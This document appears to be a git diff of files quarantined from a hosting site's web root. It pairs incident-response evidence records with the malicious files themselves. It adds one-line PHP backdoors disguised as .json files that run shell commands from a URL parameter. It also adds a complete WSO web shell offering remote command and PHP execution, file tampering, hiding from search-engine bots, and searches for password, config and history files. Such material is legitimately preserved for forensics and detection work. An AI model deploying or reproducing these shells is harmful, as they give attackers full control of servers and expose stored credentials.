@@ -0,0 +1,15 @@ +{ + "finding_ref": "4769", + "log_excerpt": "[quarantine] www.archline.hu:components/r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111919, + "size": 74, + "uid": 20043 + }, + "rel_path": "components/r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/components/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/components/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/components/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/components/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..468d861 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4760", + "log_excerpt": "[quarantine] www.archline.hu:components/r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/components/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111773, + "size": 74, + "uid": 20043 + }, + "rel_path": "components/r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/components/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/components/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/components/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/components/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..77c0fc8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4766", + "log_excerpt": "[quarantine] www.archline.hu:components/r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/components/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111755, + "size": 74, + "uid": 20043 + }, + "rel_path": "components/r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..cc73229 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4770", + "log_excerpt": "[quarantine] www.archline.hu:components/r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111792, + "size": 74, + "uid": 20043 + }, + "rel_path": "components/r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..441f2cc --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4765", + "log_excerpt": "[quarantine] www.archline.hu:components/r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/components/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111774, + "size": 74, + "uid": 20043 + }, + "rel_path": "components/r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/components/rce_gh9k5v.php.json b/var/www/hosting/archline.hu/www/components/rce_gh9k5v.php.json new file mode 100644 index 0000000..24c02b8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/rce_gh9k5v.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/components/rce_gh9k5v.php.json.evidence.json b/var/www/hosting/archline.hu/www/components/rce_gh9k5v.php.json.evidence.json new file mode 100644 index 0000000..9c7c643 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/rce_gh9k5v.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4763", + "log_excerpt": "[quarantine] www.archline.hu:components/rce_gh9k5v.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/components/rce_gh9k5v.php.json)", + "original_sha256": "9ba4b855f3bf60b7e6bf5678beca5959f76b278e4fbd911434d08c5ba0f17926", + "original_stat": { + "gid": 30037, + "mtime": 1783813022, + "size": 117, + "uid": 20043 + }, + "rel_path": "components/rce_gh9k5v.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/components/rce_wl28l3.php.json b/var/www/hosting/archline.hu/www/components/rce_wl28l3.php.json new file mode 100644 index 0000000..c1854f3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/rce_wl28l3.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/components/rce_wl28l3.php.json.evidence.json b/var/www/hosting/archline.hu/www/components/rce_wl28l3.php.json.evidence.json new file mode 100644 index 0000000..bc144c3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/rce_wl28l3.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4764", + "log_excerpt": "[quarantine] www.archline.hu:components/rce_wl28l3.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/components/rce_wl28l3.php.json)", + "original_sha256": "eff6ad6424feaa82e756ab3264e8689f6293d56dd50f97e585c9572e2ae4cfaf", + "original_stat": { + "gid": 30037, + "mtime": 1783812935, + "size": 117, + "uid": 20043 + }, + "rel_path": "components/rce_wl28l3.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/hyjhxp.php b/var/www/hosting/archline.hu/www/hyjhxp.php new file mode 100755 index 0000000..493b2ad --- /dev/null +++ b/var/www/hosting/archline.hu/www/hyjhxp.php @@ -0,0 +1,1626 @@ +=strlen($str))break;}}return base64_decode($enc_str);} +@ini_set('error_log',NULL); +@ini_set('log_errors',0); +@ini_set('max_execution_time',0); +@set_time_limit(0); +if (PHP_VERSION_ID < 70000) + @set_magic_quotes_runtime(0); +@define('VERSION', '4.2.5'); +if(get_magic_quotes_gpc()) { + function stripslashes_array($array) { + return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); + } + $_POST = stripslashes_array($_POST); + $_COOKIE = stripslashes_array($_COOKIE); +} +/* (С) 11.2011 oRb */ +if(!empty($▛)) { + if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛)) + prototype(md5($_SERVER['HTTP_HOST']), $▛); + if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛)) + hardLogin(); +} +if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) + $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘; +function hardLogin() { + if(!empty($_SERVER['HTTP_USER_AGENT'])) { + $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); + if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { + header('HTTP/1.0 404 Not Found'); + exit; + } + } + die("
Password
"); +} +if(strtolower(substr(PHP_OS,0,3)) == "win") + $os = 'win'; +else + $os = 'nix'; +$safe_mode = @ini_get('safe_mode'); +if(!$safe_mode) + error_reporting(0); +$disable_functions = @ini_get('disable_functions'); +$home_cwd = @getcwd(); +if(isset($_POST['c'])) + @chdir($_POST['c']); +$cwd = @getcwd(); +if($os == 'win') { + $home_cwd = str_replace("\\", "/", $home_cwd); + $cwd = str_replace("\\", "/", $cwd); +} +if($cwd[strlen($cwd)-1] != '/') + $cwd .= '/'; +/* (С) 04.2015 Pirat */ +function hardHeader() { + if(empty($_POST['charset'])) + $_POST['charset'] = $GLOBALS['▜']; + echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ." + + +
+
+ + + + + + +
"; + $freeSpace = @diskfreespace($GLOBALS['cwd']); + $totalSpace = @disk_total_space($GLOBALS['cwd']); + $totalSpace = $totalSpace?$totalSpace:1; + $release = @php_uname('r'); + $kernel = @php_uname('s'); + $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; + if(strpos('Linux', $kernel) !== false) + $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); + else + $explink .= urlencode($kernel . ' ' . substr($release,0,3)); + if(!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; + } else { + $uid = @posix_getpwuid(@posix_geteuid()); + $gid = @posix_getgrgid(@posix_getegid()); + $user = $uid['name']; + $uid = $uid['uid']; + $group = $gid['name']; + $gid = $gid['gid']; + } + $cwd_links = ''; + $path = explode("/", $GLOBALS['cwd']); + $n=count($path); + for($i=0; $i<$n-1; $i++) { + $cwd_links .= "".$path[$i]."/"; + } + $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); + $opt_charsets = ''; + foreach($charsets as $▟) + $opt_charsets .= ''; + $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); + if(!empty($GLOBALS['▛'])) + $m['Logout'] = 'Logout'; + $m['Self remove'] = 'SelfRemove'; + $menu = ''; + foreach($m as $k => $v) + $menu .= '[ '.$k.' ]'; + $drives = ""; + if ($GLOBALS['os'] == 'win') { + foreach(range('c','z') as $drive) + if (is_dir($drive.':\\')) + $drives .= '[ '.$drive.' ] '; + } + /* (С) 08.2015 dmkcv */ + echo ''. + ''. + '
Uname:
User:
Php:
Hdd:
Cwd:'.($GLOBALS['os'] == 'win'?'
Drives:':'').'
'.substr(@php_uname(), 0, 120).' [ Google ] [ Exploit-DB ]
'.$uid.' ( '.$user.' ) Group: '.$gid.' ( ' .$group. ' )
'.@phpversion().' Safe mode: '.($GLOBALS['safe_mode']?'ON':'OFF').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
'.viewSize($totalSpace).' Free: '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)
'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.'

Server IP:
'.gethostbyname($_SERVER["HTTP_HOST"]).'
Client IP:
'.$_SERVER['REMOTE_ADDR'].'
'. + ''.$menu.'
'; +} +function hardFooter() { + $is_writable = is_writable($GLOBALS['cwd'])?" [ Writeable ]":" (Not writable)"; + echo " +
+ + + + + + + + + + +
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
+ + + + + + Upload file:$is_writable

+
+ + "; +} +if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } +if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } +function ex($in) { + $▖ = ''; + if (function_exists('exec')) { + @exec($in,$▖); + $▖ = @join("\n",$▖); + } elseif (function_exists('passthru')) { + ob_start(); + @passthru($in); + $▖ = ob_get_clean(); + } elseif (function_exists('system')) { + ob_start(); + @system($in); + $▖ = ob_get_clean(); + } elseif (function_exists('shell_exec')) { + $▖ = shell_exec($in); + } elseif (is_resource($f = @popen($in,"r"))) { + $▖ = ""; + while(!@feof($f)) + $▖ .= fread($f,1024); + pclose($f); + }else return "↳ Unable to execute command\n"; + return ($▖==''?"↳ Query did not return anything\n":$▖); +} +function viewSize($s) { + if($s >= 1073741824) + return sprintf('%1.2f', $s / 1073741824 ). ' GB'; + elseif($s >= 1048576) + return sprintf('%1.2f', $s / 1048576 ) . ' MB'; + elseif($s >= 1024) + return sprintf('%1.2f', $s / 1024 ) . ' KB'; + else + return $s . ' B'; +} +function perms($p) { + if (($p & 0xC000) == 0xC000)$i = 's'; + elseif (($p & 0xA000) == 0xA000)$i = 'l'; + elseif (($p & 0x8000) == 0x8000)$i = '-'; + elseif (($p & 0x6000) == 0x6000)$i = 'b'; + elseif (($p & 0x4000) == 0x4000)$i = 'd'; + elseif (($p & 0x2000) == 0x2000)$i = 'c'; + elseif (($p & 0x1000) == 0x1000)$i = 'p'; + else $i = 'u'; + $i .= (($p & 0x0100) ? 'r' : '-'); + $i .= (($p & 0x0080) ? 'w' : '-'); + $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); + $i .= (($p & 0x0020) ? 'r' : '-'); + $i .= (($p & 0x0010) ? 'w' : '-'); + $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); + $i .= (($p & 0x0004) ? 'r' : '-'); + $i .= (($p & 0x0002) ? 'w' : '-'); + $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); + return $i; +} +function viewPermsColor($f) { + if (!@is_readable($f)) + return ''.perms(@fileperms($f)).''; + elseif (!@is_writable($f)) + return ''.perms(@fileperms($f)).''; + else + return ''.perms(@fileperms($f)).''; +} +function hardScandir($dir) { + if(function_exists("scandir")) { + return scandir($dir); + } else { + $dh = opendir($dir); + while (false !== ($filename = readdir($dh))) + $files[] = $filename; + return $files; + } +} +function which($p) { + $path = ex('which ' . $p); + if(!empty($path)) + return $path; + return false; +} +function actionRC() { + if(!@$_POST['p1']) { + $a = array( + "uname" => php_uname(), + "php_version" => phpversion(), + "VERSION" => VERSION, + "safemode" => @ini_get('safe_mode') + ); + echo serialize($a); + } else { + eval($_POST['p1']); + } +} +function prototype($k, $v) { + $_COOKIE[$k] = $v; + setcookie($k, $v); +} +function actionSecInfo() { + hardHeader(); + echo '

Server security information

'; + function showSecParam($n, $v) { + $v = trim($v); + if($v) { + echo '' . $n . ': '; + if(strpos($v, "\n") === false) + echo $v . '
'; + else + echo '
' . $v . '
'; + } + } + showSecParam('Server software', @getenv('SERVER_SOFTWARE')); + if(function_exists('apache_get_modules')) + showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); + showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); + showSecParam('Open base dir', @ini_get('open_basedir')); + showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); + showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); + showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); + $temp=array(); + if(function_exists('mysql_get_client_info')) + $temp[] = "MySql (".mysql_get_client_info().")"; + if(function_exists('mssql_connect')) + $temp[] = "MSSQL"; + if(function_exists('pg_connect')) + $temp[] = "PostgreSQL"; + if(function_exists('oci_connect')) + $temp[] = "Oracle"; + showSecParam('Supported databases', implode(', ', $temp)); + echo '
'; + if($GLOBALS['os'] == 'nix') { + showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); + showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); + showSecParam('OS version', @file_get_contents('/proc/version')); + showSecParam('Distr name', @file_get_contents('/etc/issue.net')); + if(!$GLOBALS['safe_mode']) { + $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + echo '
'; + $temp=array(); + foreach ($userful as $â–Ÿ) + if(which($â–Ÿ)) + $temp[] = $â–Ÿ; + showSecParam('Userful', implode(', ',$temp)); + $temp=array(); + foreach ($danger as $â–Ÿ) + if(which($â–Ÿ)) + $temp[] = $â–Ÿ; + showSecParam('Danger', implode(', ',$temp)); + $temp=array(); + foreach ($downloaders as $â–Ÿ) + if(which($â–Ÿ)) + $temp[] = $â–Ÿ; + showSecParam('Downloaders', implode(', ',$temp)); + echo '
'; + showSecParam('HDD space', ex('df -h')); + showSecParam('Hosts', @file_get_contents('/etc/hosts')); + showSecParam('Mount options', @file_get_contents('/etc/fstab')); + } + } else { + showSecParam('OS Version',ex('ver')); + showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); + showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); + } + echo '
'; + hardFooter(); +} +function actionFilesTools() { + if( isset($_POST['p1']) ) + $_POST['p1'] = urldecode($_POST['p1']); + if(@$_POST['p2']=='download') { + if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { + ob_start("ob_gzhandler", 4096); + header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); + if (function_exists("mime_content_type")) { + $type = @mime_content_type($_POST['p1']); + header("Content-Type: " . $type); + } else + header("Content-Type: application/octet-stream"); + $fp = @fopen($_POST['p1'], "r"); + if($fp) { + while(!@feof($fp)) + echo @fread($fp, 1024); + fclose($fp); + } + }exit; + } + if( @$_POST['p2'] == 'mkfile' ) { + if(!file_exists($_POST['p1'])) { + $fp = @fopen($_POST['p1'], 'w'); + if($fp) { + $_POST['p2'] = "edit"; + fclose($fp); + } + } + } + hardHeader(); + echo '

File tools

'; + if( !file_exists(@$_POST['p1']) ) { + echo 'File not exists'; + hardFooter(); + return; + } + $uid = @posix_getpwuid(@fileowner($_POST['p1'])); + if(!$uid) { + $uid['name'] = @fileowner($_POST['p1']); + $gid['name'] = @filegroup($_POST['p1']); + } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); + echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; + echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; + if( empty($_POST['p2']) ) + $_POST['p2'] = 'view'; + if( is_file($_POST['p1']) ) + $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame'); + else + $m = array('Chmod', 'Rename', 'Touch'); + foreach($m as $v) + echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; + echo '

'; + switch($_POST['p2']) { + case 'view': + echo '
';
+			$fp = @fopen($_POST['p1'], 'r');
+			if($fp) {
+				while( !@feof($fp) )
+					echo htmlspecialchars(@fread($fp, 1024));
+				@fclose($fp);
+			}
+			echo '
'; + break; + case 'highlight': + if( @is_readable($_POST['p1']) ) { + echo '
'; + $oRb = @highlight_file($_POST['p1'],true); + echo str_replace(array(''), array(''),$oRb).'
'; + } + break; + case 'chmod': + if( !empty($_POST['p3']) ) { + $perms = 0; + for($i=strlen($_POST['p3'])-1;$i>=0;--$i) + $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); + if(!@chmod($_POST['p1'], $perms)) + echo 'Can\'t set permissions!
'; + } + clearstatcache(); + echo '
'; + break; + case 'edit': + if( !is_writable($_POST['p1'])) { + echo 'File isn\'t writeable'; + break; + } + if( !empty($_POST['p3']) ) { + $time = @filemtime($_POST['p1']); + $_POST['p3'] = substr($_POST['p3'],1); + $fp = @fopen($_POST['p1'],"w"); + if($fp) { + @fwrite($fp,$_POST['p3']); + @fclose($fp); + echo 'Saved!
'; + @touch($_POST['p1'],$time,$time); + } + } + echo '
'; + break; + case 'hexdump': + $c = @file_get_contents($_POST['p1']); + $n = 0; + $h = array('00000000
','',''); + $len = strlen($c); + for ($i=0; $i<$len; ++$i) { + $h[1] .= sprintf('%02X',ord($c[$i])).' '; + switch ( ord($c[$i]) ) { + case 0: $h[2] .= ' '; break; + case 9: $h[2] .= ' '; break; + case 10: $h[2] .= ' '; break; + case 13: $h[2] .= ' '; break; + default: $h[2] .= $c[$i]; break; + } + $n++; + if ($n == 32) { + $n = 0; + if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} + $h[1] .= '
'; + $h[2] .= "\n"; + } + } + echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; + break; + case 'rename': + if( !empty($_POST['p3']) ) { + if(!@rename($_POST['p1'], $_POST['p3'])) + echo 'Can\'t rename!
'; + else + die(''); + } + echo '
'; + break; + case 'touch': + if( !empty($_POST['p3']) ) { + $time = strtotime($_POST['p3']); + if($time) { + if(!touch($_POST['p1'],$time,$time)) + echo 'Fail!'; + else + echo 'Touched!'; + } else echo 'Bad time format!'; + } + clearstatcache(); + echo '
'; + break; + /* (С) 12.2015 mitryz */ + case 'frame': + $frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT']))); + if ($frameSrc[0] != '/') + $frameSrc = '/' . $frameSrc; + if ($frameSrc[strlen($frameSrc) - 1] != '/') + $frameSrc = $frameSrc . '/'; + $frameSrc = $frameSrc . htmlspecialchars($_POST['p1']); + echo ''; + break; + } + echo '
'; + hardFooter(); +} +if($os == 'win') + $aliases = array( + "List Directory" => "dir", + "Find index.php in current dir" => "dir /s /w /b index.php", + "Find *config*.php in current dir" => "dir /s /w /b *config*.php", + "Show active connections" => "netstat -an", + "Show running services" => "net start", + "User accounts" => "net user", + "Show computers" => "net view", + "ARP Table" => "arp -a", + "IP Configuration" => "ipconfig /all" + ); +else + $aliases = array( + "List dir" => "ls -lha", + "list file attributes on a Linux second extended file system" => "lsattr -va", + "show opened ports" => "netstat -an | grep -i listen", + "process status" => "ps aux", + "Find" => "", + "find all suid files" => "find / -type f -perm -04000 -ls", + "find suid files in current dir" => "find . -type f -perm -04000 -ls", + "find all sgid files" => "find / -type f -perm -02000 -ls", + "find sgid files in current dir" => "find . -type f -perm -02000 -ls", + "find config.inc.php files" => "find / -type f -name config.inc.php", + "find config* files" => "find / -type f -name \"config*\"", + "find config* files in current dir" => "find . -type f -name \"config*\"", + "find all writable folders and files" => "find / -perm -2 -ls", + "find all writable folders and files in current dir" => "find . -perm -2 -ls", + "find all service.pwd files" => "find / -type f -name service.pwd", + "find service.pwd files in current dir" => "find . -type f -name service.pwd", + "find all .htpasswd files" => "find / -type f -name .htpasswd", + "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", + "find all .bash_history files" => "find / -type f -name .bash_history", + "find .bash_history files in current dir" => "find . -type f -name .bash_history", + "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", + "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", + "Locate" => "", + "locate httpd.conf files" => "locate httpd.conf", + "locate vhosts.conf files" => "locate vhosts.conf", + "locate proftpd.conf files" => "locate proftpd.conf", + "locate psybnc.conf files" => "locate psybnc.conf", + "locate my.conf files" => "locate my.conf", + "locate admin.php files" =>"locate admin.php", + "locate cfg.php files" => "locate cfg.php", + "locate conf.php files" => "locate conf.php", + "locate config.dat files" => "locate config.dat", + "locate config.php files" => "locate config.php", + "locate config.inc files" => "locate config.inc", + "locate config.inc.php" => "locate config.inc.php", + "locate config.default.php files" => "locate config.default.php", + "locate config* files " => "locate config", + "locate .conf files"=>"locate '.conf'", + "locate .pwd files" => "locate '.pwd'", + "locate .sql files" => "locate '.sql'", + "locate .htpasswd files" => "locate '.htpasswd'", + "locate .bash_history files" => "locate '.bash_history'", + "locate .mysql_history files" => "locate '.mysql_history'", + "locate .fetchmailrc files" => "locate '.fetchmailrc'", + "locate backup files" => "locate backup", + "locate dump files" => "locate dump", + "locate priv files" => "locate priv" + ); +function actionConsole() { + if(!empty($_POST['p1']) && !empty($_POST['p2'])) { + prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); + $_POST['p1'] .= ' 2>&1'; + } elseif(!empty($_POST['p1'])) + prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); + if(isset($_POST['ajax'])) { + prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); + ob_start(); + echo "d.cf.cmd.value='';\n"; + $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); + if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { + if(@chdir($match[1])) { + $GLOBALS['cwd'] = @getcwd(); + echo "c_='".$GLOBALS['cwd']."';"; + } + } + echo "d.cf.output.value+='".$temp."';"; + echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; + $temp = ob_get_clean(); + echo strlen($temp), "\n", $temp; + exit; + } + if(empty($_POST['ajax'])&&!empty($_POST['p1'])) + prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); + hardHeader(); + echo ""; + echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; + echo '
'; + hardFooter(); +} +function actionPhp() { + if( isset($_POST['ajax']) ) { + $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; + ob_start(); + eval($_POST['p1']); + $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; + echo strlen($temp), "\n", $temp; + exit; + } + hardHeader(); + if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { + echo '

PHP info

'; + ob_start(); + phpinfo(); + $tmp = ob_get_clean(); + $tmp = preg_replace('!body {.*}!msiU','',$tmp); + $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); + $tmp = preg_replace('!h1!msiU','h2',$tmp); + $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); + $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); + echo $tmp; + echo '

'; + } + if(empty($_POST['ajax'])&&!empty($_POST['p1'])) + $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; + echo '

Execution PHP-code

'; + echo ' send using AJAX
';
+	if(!empty($_POST['p1'])) {
+		ob_start();
+		eval($_POST['p1']);
+		echo htmlspecialchars(ob_get_clean());
+	}
+	echo '
